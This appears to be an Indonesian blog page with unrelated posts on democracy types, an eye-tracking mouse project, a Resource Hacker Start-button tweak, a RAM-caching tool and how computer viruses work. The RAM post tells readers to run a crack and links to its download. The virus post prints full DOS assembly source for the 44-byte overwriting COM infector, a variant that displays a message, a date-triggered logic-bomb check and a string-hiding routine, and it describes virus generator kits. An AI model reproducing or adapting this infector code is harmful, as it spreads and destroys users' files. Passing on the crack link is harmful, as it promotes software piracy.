• Demokrasi Tidak Langsung
Menurut dasar prinsip ideologi, demokrasi dibedakan atas :
• Demokrasi Konstitusional (Demokrasi Liberal)
• Demokrasi Rakyat (Demokrasi Proletar)
Menurut dasar yang menjadi titik perhatian atau prioritasnya, demokrasi dibedakan atas :
• Demokrasi Formal
• Demokrasi Material
• Demokrasi Campuran
Menurut dasar wewenang dan hubungan antara alat kelengkapan negara, demokrasi dibedakan atas :
• Demokrasi Sistem Parlementer
• Demokrasi Sistem Presidensial



pengertian
Demokrasi liberal (atau demokrasi konstitusional)di indonesia
Demokrasi liberal (atau demokrasi konstitusional) adalah sistem politik yang melindungi secara konstitusional hak-hak individu dari kekuasaan pemerintah.Dalam demokrasi liberal, keputusan-keputusan mayoritas (dari proses perwakilan atau langsung) diberlakukan pada sebagian besar bidang-bidang kebijakan pemerintah yang tunduk pada pembatasan-pembatasan agar keputusan pemerintah tidak melanggar kemerdekaan dan hak-hak individu seperti tercantum dalam konstitusi.

Demokrasi liberal pertama kali dikemukakan pada Abad Pencerahan oleh penggagas teori kontrak sosial seperti Thomas Hobbes, John Locke, dan Jean-Jacques Rousseau. Semasa Perang Dingin, istilah demokrasi liberal bertolak belakang dengan komunisme ala Republik Rakyat. Pada zaman sekarang demokrasi konstitusional umumnya dibanding-bandingkan dengan demokrasi langsung atau demokrasi partisipasi.

Demokrasi liberal dipakai untuk menjelaskan sistem politik dan demokrasi barat di Amerika Serikat, Britania Raya, Kanada. Konstitusi yang dipakai dapat berupa republik (Amerika Serikat, India, Perancis) atau monarki konstitusional (Britania Raya, Spanyol). Demokrasi liberal dipakai oleh negara yang menganut sistem presidensial (Amerika Serikat), sistem parlementer (sistem Westminster: Britania Raya dan Negara-Negara Persemakmuran) atau sistem semipresidensial (Perancis).


Demokrasi Proletar
Demokrasi proletar adalah demokrasi yang berlandaskan ajaran komunisme dan marxisme. Paham demokrasi ini tidak mengakui hak asasi warga negaranya. Karena itu ajaran demokrasi komunis bertentangan dengan ajaran demokrasi konstitusional.
Dalam pelaksanaannya, asas demokrasi ternyata diterapkan secara berbeda antara negara yang satu dengan yang lainnya meskipun sumber ajaran demokrasi itu sama. Hal itu disebabkan penerapan asas demokrasi suatu negara sangat dipengaruhi oleh pandangan hidup bangsa, kepribadian bangsa, falsafah bangsa dan latar belakang sejarah bangsa itu sendiri.

dri berbagai sumberr

»»  READMORE...

Sabtu, April 10, 2010

cara menambah ram komputer dengan flaskdisk

cara menambah ram dengan menggunaka flaskdisk
untuk meningkatkan performa komputer atau PC anda bisa di lakukan dengan memperbesar

kapasitas kapasitas RAM komputer anda. Namun menambah RAM tidaklah murah alias mahal,

1 GB RAM harganya kurang lebih 250ribuan. jika anda menggunakan windows vista anda

bisa menggunakan flashdisk atau memory card sebagai memori RAM tambahan pada PC anda

dengan aplikasi vista yang bernama ReadyBoost. bagaimana dengan windows XP? windows XP

juga bisa di gunakan untuk menambah kapasitas RAM anda tanpa menggunakan keping RAM

melainkan menggunakan FD atau MC. hal tersebut dapat dilakukan dengan menggunakan

eBoostr untuk meningkatkan kapasitas RAM anda. eBoostr sendiri dapat bekerja pada 4

perangkat sekaligus dan up to 4GB perperangkat.

bagaimana cara mengunakan eBoostr?

1. Install eBoostr seperti biasa, jalankan crack-annya lalu restart komputer anda
2. Setelah restart, eBoostr akan langsung diaktifkan. Pada jendela yg muncul pilih yes
3. Pilih perngkat yg akan dijadikan cache, dalam hal ini tentu saja flash disk atau MC

anda (dalam keadaan terpasang pada komputer). Kemudian tentukan juga kapasitas cache

yg diinginkan
4. Tunggu sebentar hingga muncul jendela “Do you want to build the cache file on the

device now?” pilih yes, lalu tunggu sampai proses selesai

setelah itu anda dapat mengunakan flashdisk atau memory card sebagai RAM anda dengan

cara mencolokkan flash disk ke komputer anda. nah bagaimana? anda ingin mencoba

software eBoostr juga? silahkan download eBoostr di link di bawah ini
ini software untuk menambah ram menggunakan flaskdisk

Download Software
http://kewlshare.com/dl/dac60c278e35/eBoostr.rar.html


Download patch/crack
http://www.ziddu.com/download/3069194/CrackeBoostr.rar.html


SUMBER THE HACKINGG
»»  READMORE...

TAK ADA MOUSE mata pun JADI

Semalem gw nonton kick andy di Metro Tv tentang menggukan mata sebagai pengganti mouse.. Oh ya karya anak BANGSA loh.. Coba cari di web kick andy langsung kayanya belum ada artikelnya.. Jadi gw kasih nich artikel hasil googling aja..



Aplikasi yang satu ini terbilang unik. Namanya Eye-B Pod, singkatan dari Eye Based Pointing Device. Menurut salah satu pengembangnya, Stanley Audrey, dengan aplikasi ini pengguna komputer bisa menggerakkan pointer menggunakan gerakan mata dan kepala. Eye-B Pod secara khusus dikembangkan bagi orang-orang yang memiliki keterbatasan fisik atau cacat pada tangan.

Ide membuat Eye-B Pod muncul saat Stanley dan dua rekannya, Victor dan Josephine, mengambil mata kuliah mengenai pengolahan citra. Projek Eye-B Pod sendiri diambil dari pengembangan skripsi yang mereka kerjakan. Aplikasi ini mereka buat menggunakan bahasa pemrograman Visual C++.

Awalnya, ketiga alumnus Teknik Informatika, Universitas Bina Nusantara angkatan 2005, ini mencoba memanfaatkan jari tangan yang ditangkap oleh sensor webcam untuk menggerakkan pointer pada layar monitor. “Tetapi, setelah ditelaah lebih lanjut, ada sedikit kekurangan jika kami menggunakan jari tangan, terutama dari segi kegunaannya,” kata Stanley. Karena itulah, akhirnya mereka memutuskan untuk memanfaatkan mata sebagai penggerak pointer pada monitor.

“Kami menggunakan mata agar penelitian kami memiliki nilai kegunaan yang tinggi,” lanjut Stanley. Dia berharap agar Eye-B Pod bisa membantu orang-orang yang memiliki gangguan fisik pada bagian lengan. Syarat menggunakannya hanya satu: pengguna harus melengkapi komputernya dengan sebuah webcam (web camera).

Pengganti Mouse

Dengan Eye-B Pod, pengguna komputer dapat mengerakkan pointer pada komputernya dengan menggerakkan mata. Mereka tidak perlu lagi menggunakan mouse. “Dengan Eye-B Pod, kita juga dapat mengoptimalkan pekerjaan. Kita bisa mengoperasikan komputer dengan mata, sementara tangan kita dapat digunakan untuk melakukan kegiatan lain,” ujar Stanley.

Eye-B Pod dapat disetting agar berjalan secara otomatis ketika komputer dinyalakan. Stanley menjelaskan cara kerjanya. “Software ini membutuhkan webcam sebagai alat input-nya. Gambar-gambar yang didapat dari hasil capture webcam akan diproses,” kata dia.

Awalnya, aplikasi akan mendeteksi wajah dan mata si pengguna komputer. Setelah itu, menggunakan algoritma yang telah ditentukan, Eye-B Pod akan mendapatkan titik yang paling unik di area mata pengguna.

“Algoritma ini berjalan secara otomatis. Titik ini akan dijadikan sebagai dasar dari penjejakan objek (objek tracking),” Stanley menjelaskan. Menurut dia, setiap perubahan posisi dari titik tersebut, antara satu frame dengan frame yang lainnya, akan dianalogikan sebagai gerakan pointer pada komputer.

Jika menggerakkan pointer cukup dengan menggerakkan mata dan kepala, bagaimana cara meng-klik opsi-opsi yang terpampang di layar monitor komputer? “Untuk proses klik dapat dilakukan dengan menggunakan kedipan mata kanan maupun kiri,” jawab Stanley. Aplikasi ini, menurutnya, dapat diinstall di beragam sistem operasi.

Target

Target khusus pengguna Eye-B Pod, secara khusus, adalah orang-orang yang memiliki gangguan fisik pada bagian tangan. “Baik tuna daksa atau cacat lengan, penderita stroke, dan penderita parkinson,” kata Stanley. Namun, mereka yang tak memiliki kekurangan apapun juga dapat menggunakannya. “Karena produk ini juga dapat meningkatkan optimalitas. Kita bisa mengoperasikan komputer dengan mata, sementara tangan kita dapat digunakan untuk melakukan kegiatan lain.”

Saat ini, aplikasi yang keluar sebagai salah satu pemenang (merit) dalam INAICTA 2009 ini masih dalam tahap pengembangan. “Namun, kami telah meluncurkan pilot project-nya ke yayasan PPCI (Persatuan Penyandang Cacat Indonesia),” ucap Stanley. Dia dan dua rekannya masih punya rencana untuk mengoptimalkan fungsi Eye-B Pod dengan menambahkan fitur voice recognition pada aplikasi tersebut. Dengan begitu, pengguna bisa mengoperasikan komputernya tanpa menggunakan tangan sama sekali.


SUMBER ::: THE HACKINNGGG
»»  READMORE...

mengganti tombol start dengan nama kmu

Berikut langkah yang harus di lakukan untuk mengubahnya:
1. Kita akan memakai bantuan aplikasi yang bernama Resource Hacker. Untuk menggunakannya, download dulu aplikasi tersebut.
2. Setelah terdownload, unzip atau mekarkan file hasil unduhan tersebut ke folder tersendiri.
3. Klik ganda file ResHacker.exe.
4. Di Resouce Hacker, klik menu File -> Open. Di jendela Open file containing resource… lalu ketikan di File name: %windir%\explorer.exe.

5. Setelah keluar data-data resource dari explorer.exe, klik String Table, klik 37 lalu klik 1033.

6. Lalu lihat di panel sebelah kanan, ubah string start (baris nomor 578) menjadi teks anda sendiri tapi saya sarankan jangan terlalu panjang. Lalu klik tombol Compile Script. Ingat jangan lupa klik tombol Compile Script, biasanya trik ini gagal gara-gara kelupaan akan hal ini.

7. Klik menu File -> Save As, beri nama sesuai keinginan anda, kalau saya, saya beri nama B_J.exe. Simpan file tersebut di folder Windows anda (biasanya sih C:\Windows\) lalu klik tombol Save. Hati-hati jangan simpan perubahan ini file explorer.exe anda (melalui menu File -> Save), anda harus simpan ke file lain.

8. Setelah itu kita arahkan shell Windows ke file yang baru kita buat tadi, yang telah di ubah teks-nya. Caranya buka Registry Editor dengan klik tombol Start -> Run, ketik regedit lalu tekan tombol Enter.
9. Arahkan kursor anda ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.

10. Cari key value: Shell. Di situ secara standart tertulis explorer.exe, ubah ke file yang telah kita hack tadi (kalau dalam kasus saya, saya ubah ke B_J.exe). Untuk mengubah value data-nya tinggal klik ganda key value Shell, lalu di kotak Edit String isikan nama file-nya.

11. Tutup Registry Editor lalu restart komputer anda.
12. Jika semua benar, tombol Start anda sudah berganti nama.
untuk download aplikasi nya di sini:
http://angusj.com/resourcehacker/
SUMBER ::: THE HACKING
»»  READMORE...

cara kerja virus

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line.

Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalam hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah terinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2, maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.

Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah:

1. Kemampuan mendapatkan informasi

2. Kemampuan memeriksa program

3. Kemampuan menggandakan diri / menularkan

4. Kemampuan mengadakan manipulasi

5. Kemampuan menyembunyikan diri sendiri

Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

1. Kemampuan mendapatkan Informasi

Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :

1. Apakah Extensi File tersebut ( COM,EXE, BAT)

2. Apa Atribut file ( Hidden, Readonly, Archive)

3. Besar File Yang akan di infeksi

Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.

Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Read only, Hidden ataukah virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.

Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file

Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file

———

int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi

je exit ; kalau tidak ada exit

———

file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; Akhir kode Virus

Listing Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX (Find First Matching File), dan mendapatkan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok (Find Next Matching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer, karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diinfeksi akan bertambah besar, dan akan mencurigakan pemakai komputer.

Berikut ini contoh listing dari kemampuan untuk memeriksa file

Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ; data 3 byte pertama dari file asli
yang belum tertular
infect_file : ; bagian penginfeksian

———— ; rutin infeksi

int 20h ; Dos Exit function
nop ; No Operation

Listing Periksa File

Pada rutin diatas dapat dilihat bagaimana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows. Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.

3. Kemampuan untuk menggandakan diri / Replicating

Kemampuan ini merupakan inti utama dari Virus Komputer, karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak (Rutin untuk Virus Appending / NonOverwriting), dan dapat berjalan sebagaimana mestinnya.

Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu (sebesar memory di komputer), sedangkan file COM hanya dibatasi sampai 64 Kb (Base memory). Rutin replikator pada file COM akan mendeteksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil

badan Virus yang ada di belakang file korban.

Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

Dalam program dapat diambil contoh 44-Virus.Com, yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.

Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.

Berikut ini listing dari 44-Virus.Asm :

Virus segment org 100h ; file COM

assume cs:virus

len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Interupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : db 090h ; Akhir badan virus “V2″

virus ends

end start

Listing Replicating / Penggandaan

4. Kemampuan Mengadakan Manipulasi

Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :

1. Menampilkan tulisan / kata-kata / gambar

2. Membunyikan port speaker

3. Time bomb / logic Bomb

Menampilkan Tulisan / gambar

Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer, karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.

virus segment org 100h assume cs:virus

len equ offset last-100h ; Panjang virus = Akhir program – awal program

start : jmp mulai

msg db ‘ Modification of 44 Virus ‘,13,10

db ‘ © 2000,iwing[indovirus] ’,13,10

db ‘ – For Educational Only -$’,13,10

mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

int 21h ; Dos intrupt

go : mov ah,04eh ; Cari file dengan kategori file COM

xor cx,cx ; cx 0, = hanya file dengan atrribut Normal

lea dx,com_mask ; Nama file COM masukan ke register DX

int 21h ; Dos Intrupt

open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis

mov dx,9eh

Int 21h

infect : mov cx,len ; cx diisi panjang badan virus

lea dx,start ; Masukan header Virus “V1″ pada DX

mov ah,40h ; Tulis badan virus dalam file korban

Int 21h ; Dos Intrupt

Next : mov ah,3eh ; Tutup file korban

int 21h

mov ah,4fh ; Cari file korban lagi

int 21h

jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke

Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : int 20h ; Akhir badan virus “V2″

virus ends

end start

Listing Rutin Cetak String

Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus

© 2000,iwing[indovirus]

-For Educational Only –

setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu :

mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

int 21h ; Dos intrupt

walaupun masih sederhana tapi dari sini kita dapat mengembangkan lebih lanjut mengenai rutin ini, antara lain dengan mengabungkan tehnik pewarnaan Palete, maupun dengan cara grafik sinus, yang akan menampilkan gambar.

Rutin Port Speaker

Rutin ini juga banyak di pakai dalam pembuatan Virus Komputer, selain untuk menandakan bahwa virus tersebut sudah menulari file / sudah resident di memory juga untuk menandakan kehadiran virus tersebut. contoh virus yang menggunakan rutin ini adalah Mozzart Virus, yang akan memainkan lagu setiap kali komputer yang terinfeksi di booting.

Start : mov cx,0005h ; counter cx = 5 untuk loop jcxz beep_end ; kalau tidak bunyi keluar mov ax,0E07h ; BIOS karakter = BEL
beep_loop : int 010h ; Bunyikan loop

beep_loop ; bunyikan sampai 5 x

cx =5

beep_end :

end: mov ax,04C00h ; DOS terminate function
int 021h

Listing Port Speaker

Timing Bomb / Logic Bomb

Rutin timing bomb / logic bomb pada virus digunakan melalui sutu rutin kondisi yaitu virus akan melaksanakan rutin tertentu apabila dipenuhi suatu kondisi tertentu, dan kondisi yang umum digunakan adalah tanggal, maupun Counter komputer. Tanggal yang di pakai biasanya tanggal-tanggal istimewa bagi si pembuat virus, atau tanggal istimewa pada kejadian dunia, contohnya tanggal lahir si pembuat virus, hari natal 25 Desember, tahun baru 1 Januari, April mop 1 April, jumat tanggal 13, dan lain sebagainya.

Pada penggunaan kondisi tanggal virus akan beraksi apabila telah dipenuhi kondisi tanggal berapa virus akan melaksanakan aksinya. Contoh virus ini yang terkenal adalah Virus Michael Angelo yang akan merusak data pada tanggal 13 Maret, virus Friday 13th, Have a Nice Day virus, Cristmas virus, dan lainnya..

Perintah utama pada badan virus ini adalah membandingkan counter pada program virus dengan counter pada BIOS Clock ( CMOS ) komputer.

Rutin counter yang biasa terdapat pada virus ini adalah sebagai berikut :

; rutin counter

Xor cx,cx

mov ah,04 ; intrupt ah service 04h, Check tanggal !

int 1A

cmp dx,0101 ; 0101, apakah tanggal 1 januari ?

jz Rutin_aktivasi ; kalau ya , jalankan rutin aktivasi

jmp exit ; kalau bukan tanggal 1 januari, keluar.

Logic bomb

Virus-virus dengan rutin ini biasanya muncul tanpa diketahui oleh user, karena biasanya user tidak mengetahui kalau komputernya terserang virus ini, sampai virus telah mendapatkan kondisi counter yang sesuai dengan rutin aktivasinya, baru virus ini akan menunjukan aktivitasnya, dan biasanya aktivitasnya merusak.

Kemampuan Untuk Menyembunyikan Diri Sendiri

Virus-virus dengan kemampuan untuk menyembunyikan diri sendiri adalah virus-virus buatan programmer yang sudah pengalaman, dan virus yang mempunyai rutin untuk menyembunyikan diri akan sulit untuk dideteksi oleh progam AntiVirus. Tehnik-tehnik yang digunakan adalah dengan Enkripsi. Tehnik enkripsi yang banyak digunakan adalah XoR bit.

Suatu program virus yang ter-enkripsi membutuhkan suatu rutin Dekriptor yang akan mengembalikan susunan program virus yang sudah teracak.

V1 (Header virus berisi instruksi JMP D), yaitu instruksi untuk memanggil rutin dekriptor pada badan virus, rutin ini berfungsi untuk mengembalikan susunan badan virus seperti semula, setelah teracak oleh rutin Enkripsi. Sesudah V2 (Badan Virus) dijalankan baru rutin Enkripsi dipanggil untuk mengacak badan virus V2, baru kemudian kendali diberikan pada program asli.

Rutin ini berfungsi untuk mengacak pesan-pesan dalam badan virus agar tidak mudah dilihat oleh user, sehingga kehadiran virus ini sukar untuk diketahui, selain itu enkripsi digunakan untuk mengacak tanda pengenal virus yang digunakan oleh AntiVirus untuk mengidentifikasi suatu virus, tapi dengan tehnologi sekarang antivirus telah menggunakan tehnik Heuristic Engine yaitu suatu tehnik pengenalan pola virus, yang memudahkan untuk menditeksi virus yang terenkripsi, maka dari itu para programmer virus mengembangkan lagi suatu tehnik yaitu Polimorphic Encription , yaitu sutu tehnik untuk mengenkipsi virus dengan kunci yang teracak, sehingga setiap kali suatu virus menginfeksi file maka rutin Dekriptor dan Enkriptornya berbeda, kebanyakan penggunaan Polymorphic Encription ini menggunakan Timer tic / Clock dalam komputer sebagai kunci untuk mendekripsi dan mengEnkripsi badan virus, sehingga banyak kemungkinan kunci untuk pembuka enkripsi virus, karena itu virus ini semakin sulit untuk dideteksi. Contoh dari tehnik enkripsi ditunjukan dalam listing program dibawah ini :

;——————————————-
; Program : Encrypt.COM

; Contoh Penggunaan Encryption Pada Program

; (C) iwing[indovirus.net]

;——————————————-

.MODEL SMALL

.CODE

org 100h

start :jmp mulai

text db “0RNBIRW$DVEN 9N7AAFCSEUGYI KMMANDPAS p)5C3(”,” “

Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0

mulai : mov ah,02 ; Service 02h – Cetak karakter

mov bx,42 ; masukan 42 karakter pada bx

again : mov dl, text[bx] ; masukan data text ke dl

cmp dl,”0″ ; bandingkan dl = 0

jz go_text2 ; kalau dl = 0 jmp ke go_text2

int 21h

dec bx ; bx – 1, nilai bx di kurang 1

dec bx ; bx – 1

jmp again ; lompat ke lagi

go_text2 : mov ah,02 ; service cetak karakter

xor bx,bx ; bx di 0 kan

oke : mov dl,text2[bx] ; masukan data ke dl

cmp dl,0 ; bandingkan dl = 0

jz ending ; kalau dl = 0 loncat ke ending

int 21h

inc bx ; data bx ditambah 1, dx+1

inc bx

jmp oke ;kalau dl bukan 0 loop ke oke

ending : int 20h ; DOS Exit Function

end start

;=====================================================

Listing Enkripsi

Pada program diatas akan menghasilkan output sebagai berikut

D:\DOS>encrypt.com

(C) iwing [ indovirus.net ] -This file is fully encrypted

D:\DOS>_

Namun apabila program tersebut di Debug dengan mengunakan Debug.exe, tidak akan menghasilkan tampilan pesan seperti diatas, yang akan keluar adalah :

D:\DOS>debug encrypt.com

-d

1E59:0100 EB 68 90 30 52 4E 42 49-52 57 24 44 56 45 4E 20 .h.0RNBIRW$DVEN
1E59:0110 39 4E 37 41 41 46 43 53-45 55 47 59 49 20 4B 4D 9N7AAFCSEUGYI KM
1E59:0120 4D 41 4E 44 50 41 53 20-70 29 35 43 33 28 20 2D MANDPAS p)5C3( -
1E59:0130 34 54 63 68 42 69 54 73-4D 20 59 66 52 69 57 6C 4TchBiTsM YfRiWl
1E59:0140 35 65 4D 20 50 69 56 73-61 20 72 66 36 75 38 6C 5eM PiVsa rf6u8l
1E59:0150 39 6C 64 79 66 20 6D 65-6C 6E 33 63 44 72 76 79 9ldyf meln3cDrvy
1E59:0160 25 70 6C 74 77 65 65 64-20 00 B4 02 BB 2A 00 2E %pltweed ….*..
1E59:0170 8A 97 03 01 80 FA 30 74-06 CD 21 4B 4B EB F0 B4 ……0t..!KK…

-d

Listing Debug Encrypt.Com

Pesan yang dihasilkan akan terenkripsi, sehingga program tidak mudah dibajak atau virus tidak mudah diketahui keberadaannya, ini dikarenakan pada program digunakan 2 metode enkripsi, yang pertama program menggunakan tehnik DEC bx yang akan mencetak hanya karakter kelipatan 2 dari mulai sebelah kanan, diakhiri oleh 0 (nol) sebagai kuncinya. Yang kedua program menggunakan tehnik INC bx yaitu hanya menampilkan karakter kelipatan 2 saja yang dimulai dari karakter sebelah kiri, dan diakhiri dengan 0 (nol), sebagai kuncinya.

Enkripsi dengan DEC bx yaitu :

text db “0N[ISWUDREI VNOADFNSIU]Y GKNMINWPIS p)5C3(”,” ”

-> [ S U R I V O D N I ] G N I W I ) C (

Hasilnya : (C) IWING [ INDOVIRUS ]

Enkripsi dengan INC bx yaitu :

Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0 –> kunci

-> – T h i s f I l e I s f u l l y e n c r y p t e d

Hasilnya : This file is fully encrypted

Contoh program diatas dapat digunakan untuk tehnik enkripsi pada virus, walaupun sederhana namun cukup efektif untuk menyembunyikan pesan-pesan dalam badan virus.

Virus Generator

Diantara banyak program-program Virus Komputer, sebenarnya yang lebih berbahaya adalah Virus Generator, yaitu suatu program yang membuat virus instant / virus yang sudah jadi, dari sebuah Virus Generator saja dapat dihasilkan puluhan Virus Komputer, yang berbeda jenis dan karakternya, sehingga dalam waktu singkat orang yang mendapatkan virus generator dapat membuat virus seperti yang diinginkannya, tanpa orang tersebut mengerti tentang pemrograman assembler.

Contoh-contoh virus generator yang akan dibahas dalam Penulisan ilmiah ini ada 5 buah, yaitu :

1. VCL ( Virus Creation Laboratory )

2. IVP ( Instan Virus Production Kit )

3. G2

4. NRLG (Nuke Randomic Life Generator)

VCL (Virus Creation Laboratory)

Program virus generator ini menggunakan system menu driven dalam suatu integrated environment, sekilas program ini mirip dengan Turbo Pascal, karena system menunya Pulldown Menu.

Program VCL terdiri menu-menu yaitu : File, Option, Efects, Make, Configuration. Dimana menu file terdiri dari : New, Open, Save, Save As, Change Dir , Information , DOS Shell , dan Quit.

Pada menu Option program VCL, menyediakan berbagai macam jenis virus yang dapat dihasilkan, dan kombinasi antara Efek maupun cara-cara penyebaran antara lain

1. Apending ( Menempel ) Untuk file EXE dan COM

2. Overwriting ( Menimpa) Untuk file EXE dan COM

3. Spawning / Companion , untuk file EXE

4. Logic Bomb

5. Trojan Horse

Selain itu menu Option juga menyediakan cara-cara penyerangan, seperti melalui Directory tree, Curent Directory, Root Directory, juga jumlah penyerangan, seperti menulari 3 file dalam satu kali jalan, enkripsi ,dan lainnya..

Selain itu pada menu Option ini kita dapat memasukan Teks apa saja ke tubuh virus.
